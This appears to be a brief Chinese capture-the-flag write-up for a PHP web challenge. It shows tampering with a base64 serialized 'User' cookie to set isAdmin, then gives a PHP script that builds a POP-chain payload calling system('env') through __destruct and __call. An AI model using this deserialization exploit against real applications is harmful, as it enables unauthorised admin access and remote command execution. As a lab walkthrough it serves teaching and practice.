1.代开环境,发现一片空白。
通过抓包可以发现base64加密的user cookie
base64解密后得到序列化的字符串:O:4:"User":1:{s:7:"isAdmin";b:0;}
将零改为一后可以显示源码了
很简单的pop链构造,class A __destruct()->class B __call()
<?php
class A {
public $className="B";
public $funcName="system";
public $args="env";
}
class B {
}
$a = new A();
echo base64_encode(strrev(serialize($a)));
?>
通过payloadpost传参获得flag